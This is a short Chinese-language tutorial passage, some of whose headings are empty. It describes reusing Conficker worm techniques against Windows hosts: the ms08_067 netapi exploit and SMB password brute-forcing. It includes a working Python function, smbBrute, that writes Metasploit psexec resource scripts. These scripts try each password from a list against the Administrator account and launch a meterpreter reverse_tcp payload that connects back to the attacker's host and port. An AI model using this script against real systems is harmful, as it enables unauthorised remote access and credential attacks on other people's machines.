目錄
一、簡介
分析:
二、實現
利用:
分析:
盡管能成功地在被黑的主機上運行ms08 _ 067 netapi漏洞利用代碼, 但防衛者也能很方便地通過安裝最新的安全補丁來阻止漏洞利用代碼被執行。
因此, 腳本還需要另一種也在Conficker蠕蟲中使用過的攻擊方法。它需要用暴力攻擊的方式破解SMB用戶名/密碼, 以此獲取權限在目標主機上遠程執行 一個進程(psexec)。
利用:
輸入smbBurte函數的參數有: Metasploit腳本文件、目標主機、包含密碼列表的另一個文件, 以及本機地址和端口
將用戶名設為Windows的默認管理員administrator, 然後打開密碼列表文件。對文件中的每個密碼, 函數都會生成一個用來遠程執行(psexec)進程的Metasploit腳本。如果某個用戶名/密碼對正確,遠程執行進程的代碼就會運行回連一個命令行shell到攻擊者本機地址及對應的端口。
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport): username = 'Administrator' pF = open( passwdFile, 'r' ) for password in pF.readlines(): password = password.strip('\n').strip('\r') configFile.write('use exploit/windows/smb/psexec\n') configFile.write('set SMBUser ' + str(username) + '\n') configFile.write('set SMBPass ' + str(password) + '\n') configFile.write('set RHOST ' + str(tgtHost) + '\n') configFile.write('set PAYLOAD ' + 'windows/meterpreter/reverse_tcp\n') configFile.write('set LPORT ' + str(lport) + '\n') configFile.write('set LHOST ' + lhost + '\n') configFile.write('exploit -j -z\n')